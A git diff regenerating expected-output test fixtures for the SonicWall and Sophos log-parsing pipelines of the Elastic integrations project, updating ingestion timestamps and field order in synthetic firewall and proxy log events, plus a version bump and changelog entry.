"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "luptate id=persp sn=entsunt time=\"2017/11/16 18:08:15\" fw=10.206.107.211 pri=low c=fugi m=140 msg=\"accept\" n=inci src=10.230.173.4:2631:enp0s5632 dst= 10.192.27.157", "event": { - "ingested": "2021-06-09T13:23:15.703725600Z" + "ingested": "2021-12-14T14:54:38.699417681Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=cusant sn=atemq time=\"2017/12/01 01:10:49\" fw=10.136.31.188 pri=high c=borios m=118 Sending DHCP REQUEST (Verifying).", "event": { - "ingested": "2021-06-09T13:23:15.703729400Z" + "ingested": "2021-12-14T14:54:38.699418040Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ercita sn=ciadeser time=\"2017/12/15 08:13:24\" fw=10.175.236.135 pri=medium c=isnisi m=18 ActiveX blocked", "event": { - "ingested": "2021-06-09T13:23:15.703733100Z" + "ingested": "2021-12-14T14:54:38.699418399Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=isiuta sn=orsitam time=\"2017/12/29 15:15:58\" fw=10.159.119.34 pri=high c=psaquaea m=195 msg=\"taevita\" n=ameiusm src=10.227.15.253 dst=10.190.175.158 sport=271 dport=7005 rcvd=6587", "event": { - "ingested": "2021-06-09T13:23:15.703736600Z" + "ingested": "2021-12-14T14:54:38.699419999Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=nre sn=veli time=\"2018/01/12 22:18:32\" fw=10.62.147.186 pri=low c=elitse m=22 Ping of death blocked", "event": { - "ingested": "2021-06-09T13:23:15.703740200Z" + "ingested": "2021-12-14T14:54:38.699420449Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - 
}, "message": "id=quasia sn=adi time=\"2018/01/27 05:21:06\" fw=10.9.12.248 pri=medium c=mac m=616 msg=\"block\" n=aveni src=10.29.155.171:1871 dst=10.15.97.155:5935", "event": { - "ingested": "2021-06-09T13:23:15.703743700Z" + "ingested": "2021-12-14T14:54:38.699420816Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=llamco sn=nea time=\"2018/02/10 12:23:41\" fw=10.123.143.188 pri=medium c=orsit m=9 No new Filter list available", "event": { - "ingested": "2021-06-09T13:23:15.703747400Z" + "ingested": "2021-12-14T14:54:38.699421184Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ise sn=itau time=\"2018/02/24 19:26:15\" fw=10.44.22.97 pri=very-high c=lorsita m=907 msg=\"dolore\" n=uptate", "event": { - "ingested": "2021-06-09T13:23:15.703751600Z" + "ingested": "2021-12-14T14:54:38.699421626Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=odi sn=ptass time=\"2018/03/11 02:28:49\" fw=10.39.10.155 pri=low c=tametcon m=157 HA packet processing error", "event": { - "ingested": "2021-06-09T13:23:15.703768300Z" + "ingested": "2021-12-14T14:54:38.699421988Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=aco sn=tio time=\"2018/03/25 09:31:24\" fw=10.112.38.219 pri=high c=dantium m=261 msg=\"lor\" n=velillu usr=cteturad src= 10.18.204.87 dst= 10.25.32.107", "event": { - "ingested": "2021-06-09T13:23:15.703773500Z" + "ingested": "2021-12-14T14:54:38.699422346Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=utodita sn=aec time=\"2018-4-8 4:33:58\" fw=10.21.89.175 pri=medium c=diconse m=428 msg=\"elitse\" n=reseo 
src=10.71.238.250:41:lo3856 dst=10.246.0.167:2189:eth2632 srcMac= 01:00:5e:7c:42:0b dstMac=01:00:5e:2c:22:06 proto=icmp fw_action=\"block\"", "event": { - "ingested": "2021-06-09T13:23:15.703778200Z" + "ingested": "2021-12-14T14:54:38.699422744Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ritin sn=temporin time=\"2018-4-22 11:36:32\" fw=10.122.76.148 pri=high c=tdol m=794 msg=\"upt\" sid=mex spycat=tatem spypri=untutlab pktdatId=amcor n=ica src=10.13.66.97:2000:enp0s5411 dst=10.176.209.227:6362:eth7037 proto=ipv6/siu fw_action=\"allow\"", "event": { - "ingested": "2021-06-09T13:23:15.703782400Z" + "ingested": "2021-12-14T14:54:38.699423109Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=quaea sn=ametcons time=\"2018/05/07 06:39:06\" fw=10.74.46.22 pri=very-high c=tetur m=7 Log full; deactivating SonicWALL", "event": { - "ingested": "2021-06-09T13:23:15.703786600Z" + "ingested": "2021-12-14T14:54:38.699423466Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=ariatur sn=rer time=\"2018/05/21 13:41:41\" fw=10.210.243.175 pri=low c=atisetqu m=240 msg=\"issuscip\" n=uisa src=10.240.49.224 dst=10.77.174.205", "event": { - "ingested": "2021-06-09T13:23:15.703790500Z" + "ingested": "2021-12-14T14:54:38.699423835Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=luptatem sn=uaeratv time=\"2018/06/04 20:44:15\" fw=10.240.190.136 pri=medium c=atcupid m=255 msg=\"quamnih\" n=dminima src=10.44.150.31 dst=10.187.210.173", "event": { - "ingested": "2021-06-09T13:23:15.703794300Z" + "ingested": "2021-12-14T14:54:38.699424196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "id=ntutlabo sn=iusmodte time=\"2018-6-19 3:46:49\" fw=10.108.84.24 pri=low c=iosamnis m=606 msg=\"volupt\" n=rem src=10.113.100.237:3887:eth163 dst=10.251.248.228:6909 srcMac= 01:00:5e:8b:c1:b4 dstMac=01:00:5e:c3:ed:55proto=udp fw_action=\"deny\"", "event": { - "ingested": "2021-06-09T13:23:15.703797800Z" + "ingested": "2021-12-14T14:54:38.699424556Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=emvele sn=isnost time=\"2018/07/03 10:49:23\" fw=10.71.112.159 pri=medium c=emqu m=28 Fragmented Packet Dropped", "event": { - "ingested": "2021-06-09T13:23:15.703801800Z" + "ingested": "2021-12-14T14:54:38.699424990Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sit id=rumSect sn=ita time=\"2018/07/17 17:51:58\" fw=10.139.65.241 pri=low c=teni m=61 Diagnostic Code E", "event": { - "ingested": "2021-06-09T13:23:15.703806600Z" + "ingested": "2021-12-14T14:54:38.699425349Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oremag id=illu sn=ruredo time=\"2018/08/01 00:54:32\" fw=10.72.196.74 pri=very-high c=ptassita m=906 msg=\"its\" n=lore", "event": { - "ingested": "2021-06-09T13:23:15.703811100Z" + "ingested": "2021-12-14T14:54:38.699425707Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "sBono id=loremqu sn=tetur time=\"2018/08/15 07:57:06\" fw=10.213.94.135 pri=very-high c=urmagn m=237 msg=\"block\" n=uptat src=10.105.46.101:3346:enp0s382 dst= 10.50.44.5:7668:lo1441", "event": { - "ingested": "2021-06-09T13:23:15.703815Z" + "ingested": "2021-12-14T14:54:38.699426071Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, 
"message": "id=ddoeius sn=ugiatn time=\"2018/08/29 14:59:40\" fw=10.50.102.128 pri=high c=abore m=328 msg=\"squ\" n=uiadol src=10.60.142.127:1081:eth6291 dst= 10.52.248.251:5776:lo2241", "event": { - "ingested": "2021-06-09T13:23:15.703818900Z" + "ingested": "2021-12-14T14:54:38.699426439Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=onu sn=liquaUte time=\"2018/09/12 22:02:15\" fw=10.137.202.243 pri=high c=tempor m=134 PPPoE starting PAP Authentication", "event": { - "ingested": "2021-06-09T13:23:15.703822700Z" + "ingested": "2021-12-14T14:54:38.699426795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=mveniamq sn=taedict time=\"2018-9-27 5:04:49\" fw=10.206.69.135 pri=high c=aturve m=880 msg=\"utfug\" n=aturQu note=\"aaliq\" fw_action=\"allow\"", "event": { - "ingested": "2021-06-09T13:23:15.703826500Z" + "ingested": "2021-12-14T14:54:38.699427206Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=uiinea sn=mnisiut time=\"2018/10/11 12:07:23\" fw=10.208.228.129 pri=low c=olup m=441 msg=\"labor\" n=dol src= 10.240.54.28 dst= 10.115.38.80", "event": { - "ingested": "2021-06-09T13:23:15.703830100Z" + "ingested": "2021-12-14T14:54:38.699427563Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=mve sn=uia time=\"2018/10/25 19:09:57\" fw=10.92.237.93 pri=high c=nsequunt m=163 Disconnecting PPPoE due to traffic timeout", "event": { - "ingested": "2021-06-09T13:23:15.703833800Z" + "ingested": "2021-12-14T14:54:38.699427920Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=doei sn=cipitl time=\"2018/11/09 02:12:32\" fw=10.53.127.17 
pri=very-high c=strumex m=252 msg=\"eprehend\" n=asnu src=10.102.166.19 dst=10.104.49.142", "event": { - "ingested": "2021-06-09T13:23:15.703837600Z" + "ingested": "2021-12-14T14:54:38.699428272Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=repreh sn=plic time=\"2018/11/23 09:15:06\" fw=10.17.87.79 pri=high c=saq m=199 msg=\"block\" n=ritqu src=10.203.77.154:3916:lo4991 dst= 10.120.25.169:1965:lo4527", "event": { - "ingested": "2021-06-09T13:23:15.703841300Z" + "ingested": "2021-12-14T14:54:38.699428628Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "ipsa id=asuntexp sn=adminim time=\"2018/12/07 16:17:40\" fw=10.115.115.26 pri=high c=modoc m=88 IKE Responder: IPSec proposal not acceptable", "event": { - "ingested": "2021-06-09T13:23:15.703844900Z" + "ingested": "2021-12-14T14:54:38.699428974Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=iumt sn=tsed time=\"2018/12/21 23:20:14\" fw=10.249.120.78 pri=medium c=atuse m=34 Login screen timed out", "event": { - "ingested": "2021-06-09T13:23:15.703848900Z" + "ingested": "2021-12-14T14:54:38.699429451Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=loremag sn=tcu time=\"2019/01/05 06:22:49\" fw=10.84.251.253 pri=high c=erspi m=195 msg=\"rorsit\" n=tionemu src=10.77.95.12 dst=10.137.217.159 sport=2310 dport=563 rcvd=1629", "event": { - "ingested": "2021-06-09T13:23:15.703852600Z" + "ingested": "2021-12-14T14:54:38.699429828Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "elillum id=upt sn=rnat time=\"2019/01/19 13:25:23\" fw=10.1.96.93 pri=high c=edolo m=48 Out-of-order command 
packet dropped", "event": { - "ingested": "2021-06-09T13:23:15.703856400Z" + "ingested": "2021-12-14T14:54:38.699430188Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "doeiu id=deF sn=itempo time=\"2019/02/02 20:27:57\" fw=10.200.237.196 pri=medium c=ecillum m=995 msg=\"isci\" n=dolor src=10.165.48.224:5386 dst=10.191.242.168:5251 note=\"equep\"", "event": { - "ingested": "2021-06-09T13:23:15.703860100Z" + "ingested": "2021-12-14T14:54:38.699430548Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "BCS id=qui sn=ugiatquo time=\"2019/02/17 03:30:32\" fw=10.204.133.116 pri=medium c=autemv m=909 msg=\"emq\" n=plicaboN", "event": { - "ingested": "2021-06-09T13:23:15.703863800Z" + "ingested": "2021-12-14T14:54:38.699430923Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=vol sn=admi time=\"2019/03/03 10:33:06\" fw=10.77.229.168 pri=high c=aquiof m=178 msg=\"ende\" n=abor src=10.185.37.32:708 dst=10.116.173.79:7693", "event": { - "ingested": "2021-06-09T13:23:15.703867500Z" + "ingested": "2021-12-14T14:54:38.699431286Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=olorem sn=gitse time=\"2019/03/17 17:35:40\" fw=10.245.127.213 pri=very-high c=billoinv m=995 msg=\"sci\" n=col src=10.219.42.212:5708 dst=10.57.85.98:3286 note=\"mquisno\"", "event": { - "ingested": "2021-06-09T13:23:15.703871200Z" + "ingested": "2021-12-14T14:54:38.699431635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=nisiu sn=imad time=\"2019/04/01 00:38:14\" fw=10.30.101.79 pri=high c=tenimad m=97 n=sitametc src= 10.152.35.175:2737:enp0s3423 dst= 
10.88.244.209:6953:enp0s2460 proto=ipv6-icmp op=caecat sent=5835 dstname=tquidol", "event": { - "ingested": "2021-06-09T13:23:15.703874900Z" + "ingested": "2021-12-14T14:54:38.699431987Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "undeom id=emullamc sn=tec time=\"2019/04/15 07:40:49\" fw=10.29.118.7 pri=medium c=mveleum m=537 msg=\"accept\" f=exercita n=sBonorum src= 10.132.171.15 dst= 10.107.216.138:3147:lo5057:ugitsedq5067.internal.test proto=rdp sent=5943 rcvd=1635", "event": { - "ingested": "2021-06-09T13:23:15.703879100Z" + "ingested": "2021-12-14T14:54:38.699432333Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=gna sn=isiutali time=\"2019/04/29 14:43:23\" fw=10.156.152.182 pri=very-high c=ons m=137 Wan IP Changed", "event": { - "ingested": "2021-06-09T13:23:15.703883100Z" + "ingested": "2021-12-14T14:54:38.699432686Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=uaturve sn=amquisno time=\"2019/05/13 21:45:57\" fw=10.123.74.66 pri=very-high c=mquiad m=351 msg=\"CSe\" n=lors src=10.135.70.159 dst=10.195.223.82", "event": { - "ingested": "2021-06-09T13:23:15.703887100Z" + "ingested": "2021-12-14T14:54:38.699433082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=atu sn=iusm time=\"2019/05/28 04:48:31\" fw=10.20.81.176 pri=low c=stquido m=261 msg=\"rsitvolu\" n=mnisi usr=usmo src=10.22.244.71:1865:eth3249 dst= 10.142.120.198", "event": { - "ingested": "2021-06-09T13:23:15.703890900Z" + "ingested": "2021-12-14T14:54:38.699433443Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=oin sn=itseddoe time=\"2019/06/11 
11:51:06\" fw=10.141.143.56 pri=low c=erc m=125 Unused AV log entry.", "event": { - "ingested": "2021-06-09T13:23:15.703894900Z" + "ingested": "2021-12-14T14:54:38.699433802Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=giatquov sn=olu time=\"2019/06/25 18:53:40\" fw=10.137.103.62 pri=medium c=serror m=105 Sending DHCP DISCOVER.", "event": { - "ingested": "2021-06-09T13:23:15.703898800Z" + "ingested": "2021-12-14T14:54:38.699434172Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "emagn id=emulla sn=mips time=\"2019/07/10 01:56:14\" fw=10.201.146.83 pri=very-high c=atnula m=34 Login screen timed out", "event": { - "ingested": "2021-06-09T13:23:15.703902700Z" + "ingested": "2021-12-14T14:54:38.699434533Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=itametc sn=ori time=\"2019/07/24 08:58:48\" fw=10.202.74.93 pri=low c=ido m=144 Primary firewall has transitioned to Idle", "event": { - "ingested": "2021-06-09T13:23:15.703906500Z" + "ingested": "2021-12-14T14:54:38.699434893Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=doconse sn=etdol time=\"2019/08/07 16:01:23\" fw=10.156.88.51 pri=high c=tura m=658 msg=\"osquirat\" n=equat src=10.56.10.84:5366 dst=10.12.54.142:6543", "event": { - "ingested": "2021-06-09T13:23:15.703910300Z" + "ingested": "2021-12-14T14:54:38.699435251Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=min sn=oluptat time=\"2019/08/21 23:03:57\" fw=10.162.129.196 pri=medium c=snisi m=195 msg=\"magnaal\" n=uscip src=10.222.169.140 dst=10.117.63.181 sport=5299 dport=6863 rcvd=7416", "event": { - "ingested": 
"2021-06-09T13:23:15.703914Z" + "ingested": "2021-12-14T14:54:38.699435607Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=eacommo sn=ueip time=\"2019/09/05 06:06:31\" fw=10.243.252.157 pri=low c=minim m=867 msg=\"scipi\" sess=tur n=acon", "event": { - "ingested": "2021-06-09T13:23:15.703918100Z" + "ingested": "2021-12-14T14:54:38.699435954Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "usm id=labori sn=porai time=\"2019/09/19 13:09:05\" fw=10.73.176.98 pri=high c=ostr m=60 Access to Proxy Server Blocked", "event": { - "ingested": "2021-06-09T13:23:15.703921800Z" + "ingested": "2021-12-14T14:54:38.699436307Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=lup sn=upta time=\"2019-10-3 8:11:40\" fw=10.247.88.138 pri=very-high c=orissu m=794 msg=\"fic\" sid=sBon spycat=usmod spypri=umdol pktdatId=rumexerc n=isiutali src=10.57.255.4:239:lo1325 dst=10.200.122.184:1176:eth5397 proto=rdp/amvo fw_action=\"allow\"", "event": { - "ingested": "2021-06-09T13:23:15.703926Z" + "ingested": "2021-12-14T14:54:38.699436657Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=mmod sn=iti time=\"2019/10/18 03:14:14\" fw=10.55.81.14 pri=medium c=asp m=19 Java blocked", "event": { - "ingested": "2021-06-09T13:23:15.703929800Z" + "ingested": "2021-12-14T14:54:38.699437022Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=mag sn=gelitse time=\"2019/11/01 10:16:48\" fw=10.195.58.44 pri=high c=radip m=413 msg=\"upta\" n=tetura src=10.206.229.61:3467 dst=10.129.101.147:3606", "event": { - "ingested": "2021-06-09T13:23:15.703933600Z" + "ingested": 
"2021-12-14T14:54:38.699437384Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=nostrud sn=cteturad time=\"2019/11/15 17:19:22\" fw=10.150.163.151 pri=high c=veniam m=159 Diagnostic Code F", "event": { - "ingested": "2021-06-09T13:23:15.703937200Z" + "ingested": "2021-12-14T14:54:38.699437766Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "id=imavenia sn=expli time=\"2019/11/30 00:21:57\" fw=10.144.57.239 pri=medium c=rur m=520 msg=\"itse\" n=ilm src=10.167.9.200:4003:lo5561 dst= 10.119.4.120:3822:enp0s234", "event": { - "ingested": "2021-06-09T13:23:15.703941100Z" + "ingested": "2021-12-14T14:54:38.699438124Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "oluptate id=lit sn=santi time=\"2019/12/14 07:24:31\" fw=10.211.112.194 pri=low c=uis m=1079 msg=\"Clientamcis assigned IP:10.221.220.148\" n=apar", "event": { - "ingested": "2021-06-09T13:23:15.703945Z" + "ingested": "2021-12-14T14:54:38.699438510Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/sonicwall/manifest.yml b/packages/sonicwall/manifest.yml index 3efbf66144f..75ec565e4f5 100644 --- a/packages/sonicwall/manifest.yml +++ b/packages/sonicwall/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: sonicwall title: Sonicwall-FW Logs -version: 0.6.0 +version: 0.6.1 description: Collect logs from Sonicwall devices with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/sophos/changelog.yml b/packages/sophos/changelog.yml index 6b684c00e56..b12bbf5a9c2 100644 --- a/packages/sophos/changelog.yml +++ b/packages/sophos/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json b/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json index 0674711607a..f961c361195 100644 --- a/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/sophos/data_stream/utm/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "2016:1:29-06:09:59 localhost.localdomain smtpd[905]: MASTER[nnumqua]: QR globally disabled, status one set to 'disabled'", "event": { - "ingested": "2021-12-09T13:44:53.093892Z" + "ingested": "2021-12-14T14:54:42.826905248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:2:12-13:12:33 astarosg_TVM[5716]: id=ommod severity=medium sys=inima sub=tlabo name=web request blocked, forbidden application detectedaction=accept method=ugiatnu client=stiae facility=nofdeF user=sunt srcip=10.57.170.140 dstip=10.213.231.72 version=1.5102 storage=emips ad_domain=imadmi object=ostrume class=molest type=upt attributes=uiineavocount=tisetq node=irati account=icistatuscode=giatquov cached=eritquii profile=dexeac filteraction=iscinge size=6992 request=oreseos url=https://mail.example.net/tati/utaliqu.html?iquaUten=santium#iciatisu referer=https://www5.example.org/eporroqu/uat.txt?atquovo=suntinc#xeac error=nidolo authtime=tatn dnstime=eli cattime=nnu avscantime=dolo fullreqtime=Loremip device=idolor auth=emeumfu ua=CSed exceptions=lupt group=psaquae category=oinBCSe categoryname=mnisist content-type=sedd reputation=uatD application=iunt app-id=temveleu reason=colabo filename=eme file=numqu extension=qui time=civeli function=block line=agnaali message=gnam fwrule=tat seq=ipitla initf=enp0s7281 outitf=enp0s7084 dstmac=01:00:5e:de:94:f6 srcmac=01:00:5e:1d:c1:c0 proto=den length=tutla tos=olorema prec=;iades ttl=siarchi srcport=2289 dstport=3920 tcpflags=mqu info=apariat prec=tlabore caller=untmolli engine=remi localip=saute host=ercit2385.internal.home extra=run server=10.47.202.102 cookie=quirat set-cookie=llu", "event": { - "ingested": "2021-12-09T13:44:53.093896500Z" + "ingested": "2021-12-14T14:54:42.826908163Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { 
- "version": "1.12.0" - }, "message": "2016:2:26-20:15:08 eirure7587.internal.localhost reverseproxy: [mpori] [aaliquaU:medium] [pid 3905:lpaqui] (22)No form context found: [client sitame] No form context found when parsing iadese tag, referer: https://api.example.com/utla/utei.htm?oei=tlabori#oin", "event": { - "ingested": "2021-12-09T13:44:53.093900100Z" + "ingested": "2021-12-14T14:54:42.826908641Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:3:12-03:17:42 data4478.api.lan confd: id=iquipex severity=very-high sys=uradip sub=wri name=bor client=occa facility=stquidol user=itquiin srcip=10.106.239.55 version=1.3129 storage=atevel object=nsecte class=itame type=eumfug attributes=litcount=asun node=estia account=eaq", "event": { - "ingested": "2021-12-09T13:44:53.093906100Z" + "ingested": "2021-12-14T14:54:42.826909028Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:3:26-10:20:16 ctetura3009.www5.corp reverseproxy: [lita] [adeseru:medium] [pid 7692:eaq] amest configured -- corp normal operations", "event": { - "ingested": "2021-12-09T13:44:53.093910400Z" + "ingested": "2021-12-14T14:54:42.826909436Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:4:9-17:22:51 localhost smtpd[1411]: MASTER[inculpa]: QR globally disabled, status one set to 'disabled'", "event": { - "ingested": "2021-12-09T13:44:53.093951600Z" + "ingested": "2021-12-14T14:54:42.826909857Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:4:24-00:25:25 httpproxy[176]: [nse] disk_cache_zap (non) paquioff", "event": { - "ingested": "2021-12-09T13:44:53.093955200Z" + "ingested": "2021-12-14T14:54:42.826910239Z" + }, + "ecs": { + "version": 
"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:5:8-07:27:59 ptasnu6684.mail.lan reverseproxy: [orumSe] [boree:low] [pid 945:rQuisau] AH01915: Init: (10.18.13.211:205) You configured ofdeFini(irat) on the onev(aturauto) port!", "event": { - "ingested": "2021-12-09T13:44:53.093958900Z" + "ingested": "2021-12-14T14:54:42.826910631Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:5:22-14:30:33 ssecillu7166.internal.lan barnyard: Initializing daemon mode", "event": { - "ingested": "2021-12-09T13:44:53.093963Z" + "ingested": "2021-12-14T14:54:42.826911018Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:6:5-21:33:08 ore5643.api.lan reverseproxy: [metco] [acom:high] [pid 2164:nim] ModSecurity: utaliqu compiled version=\"rsi\"; loaded version=\"taliqui\"", "event": { - "ingested": "2021-12-09T13:44:53.093967800Z" + "ingested": "2021-12-14T14:54:42.826911409Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2016:6:20-04:35:42 ciun39.localdomain reverseproxy: [iatqu] [inBCSedu:high] [pid 4006:rorsit] AH00098: pid file tionemu overwritten -- Unclean shutdown of previous Apache run?", "event": { - "ingested": 